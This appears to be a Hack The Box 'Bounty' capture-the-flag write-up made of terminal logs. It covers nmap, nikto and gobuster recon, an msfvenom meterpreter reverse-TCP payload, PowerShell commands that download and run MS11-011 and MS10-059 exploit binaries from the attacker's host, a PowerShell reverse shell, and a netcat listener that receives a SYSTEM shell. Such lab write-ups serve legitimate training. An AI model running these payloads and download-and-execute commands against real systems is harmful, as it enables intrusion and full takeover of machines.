bounty
Introduction:
Recon
eneloop@kinetic:…/hackthebox/bounty/data$ sudo nmap -sS -sV -T4 -O -oN nmap.bounty.txt 10.10.10.93 [sudo] password for eneloop: Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 19:46 EST Nmap scan report for 10.10.10.93 Host is up (0.014s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: phone|general purpose|specialized Running (JUST GUESSING): Microsoft Windows Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 Aggressive OS guesses: Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds
Enumeration
eneloop@kinetic:…/hackthebox/bounty/data$ nikto -url http://10.10.10.93/
- Nikto v2.1.6
- Target IP: 10.10.10.93
- Target Hostname: 10.10.10.93
- Target Port: 80
- Start Time: 2021-02-17 19:48:26 (GMT-5)
- Server: Microsoft-IIS/7.5
- Retrieved x-powered-by header: ASP.NET
- The anti-clickjacking X-Frame-Options header is not present.
- The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- Retrieved x-aspnet-version header: 2.0.50727
- No CGI Directories found (use ‘-C all’ to force check all possible dirs)
- Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
- Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
- 7863 requests: 0 error(s) and 7 item(s) reported on remote host
- End Time: 2021-02-17 19:51:25 (GMT-5) (179 seconds)
- 1 host(s) tested
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.93/
Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url: http://10.10.10.93/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s
2021/02/17 19:49:11 Starting gobuster
/UploadedFiles (Status: 301) /uploadedFiles (Status: 301) /uploadedfiles (Status: 301)
2021/02/17 19:55:19 Finished
eneloop@kinetic:/oscp/tools/threader3000$
^C eneloop@kinetic:…/hackthebox/bounty/data$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.93/ -x aspx
Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url: http://10.10.10.93/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: aspx [+] Timeout: 10s
2021/02/20 08:46:47 Starting gobuster
/transfer.aspx (Status: 200) /UploadedFiles (Status: 301) Progress: 34335 / 220561 (15.57%)
Exploitation
(py3) eneloop@kinetic:…/hackthebox/bounty/data$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.38 LPORT=4455 -f psh –platform windows -a x64 -o sh.ps1 No encoder specified, outputting raw payload Payload size: 510 bytes Final size of psh file: 3269 bytes Saved as: sh.ps1 (py3) eneloop@kinetic:…/hackthebox/bounty/data$ python -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) … 10.10.10.93 - - [20/Feb/2021 22:00:50] “GET /sh.ps1 HTTP/1.1” 200 - 10.10.10.93 - - [20/Feb/2021 22:03:25] “GET /sh.ps1 HTTP/1.1” 200 -
Post-exploit/PrivEsc
PS C:\windows\system32\inetsrv>systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 2/21/2021, 4:48:15 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,584 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,585 MB
Virtual Memory: In Use: 510 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
PS C:\windows\system32\inetsrv>
(new-object net.webclient).downloadfile(‘http://10.10.14.38:8000/MS11-011.exe’, ‘\users\merlin\appdata\local\temp\MS11-011.exe’)
PS C:\windows\system32\inetsrv>systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 2/21/2021, 4:48:15 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,584 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,585 MB
Virtual Memory: In Use: 510 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
PS C:\windows\system32\inetsrv> cd C:\users\merlin\appdata\local\temp
PS C:\users\merlin\appdata\local\temp> (new-object net.webclient).downloadfile(‘http://10.10.14.38:8000/MS11-011.exe’, ‘\users\merlin\appdata\local\temp\MS11-011.exe’)
PS C:\users\merlin\appdata\local\temp> .\MS11-011.exe
PS C:\users\merlin\appdata\local\temp> whoami
bounty\merlin
PS C:\users\merlin\appdata\local\temp> MS11-011.exe
bounty\merlin
PS C:\users\merlin\appdata\local\temp> Invoke-PowerShellTcp : The term ‘MS11-011.exe’ is not recognized as the name of
a cmdlet, function, script file, or operable program. Check the spelling of th
e name, or if a path was included, verify that the path is correct and try agai
n.
At line:128 char:21
- Invoke-PowerShellTcp «« -Reverse -IPAddress 10.10.14.38 -Port 4455
- CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorExcep tion
- FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio n,Invoke-PowerShellTcp
PS C:\users\merlin\appdata\local\temp> .\MS11-011.exe PS C:\users\merlin\appdata\local\temp> whoami bounty\merlin PS C:\users\merlin\appdata\local\temp> \windows\microsoft.net\framework\v2.0.50727\msbuild -version Microsoft (R) Build Engine Version 2.0.50727.4927 [Microsoft .NET Framework, Version 2.0.50727.4927] Copyright (C) Microsoft Corporation 2005. All rights reserved.
2.0.50727.4927
PS C:\users\merlin\appdata\local\temp> (new-object net.webclient).downloadfile(‘http://10.10.14.38:8000/MS10-059.exe’, ‘\users\merlin\appdata\local\temp\MS10-059.exe’)
PS C:\users\merlin\appdata\local\temp>
PS C:\users\merlin\appdata\local\temp> .\MS10-059.exe
/Chimichurri/–>This exploit gives you a Local System shell
/Chimichurri/–>Usage: Chimichurri.exe ipaddress port
PS C:\users\merlin\appdata\local\temp> .\MS10-059.exe 10.10.14.38 4455
On Attack Machine -
(py3) eneloop@kinetic:…/hackthebox/bounty/data$ nc -lvnp 4455 listening on [any] 4455 … connect to [10.10.14.38] from (UNKNOWN) [10.10.10.93] 49164 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\users\merlin\appdata\local\temp>whoami whoami nt authority\system
C:\users\merlin\appdata\local\temp>cd ../../.. cd ../../..
C:\Users\merlin>cd .. cd ..
C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is 5084-30B0
Directory of C:\Users
05/30/2018 11:18 PM
C:\Users>cd Administrator/Desktop cd Administrator/Desktop
C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 5084-30B0
Directory of C:\Users\Administrator\Desktop
05/30/2018 11:18 PM
C:\Users\Administrator\Desktop>type root.txt type root.txt c8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXa C:\Users\Administrator\Desktop>
Notes: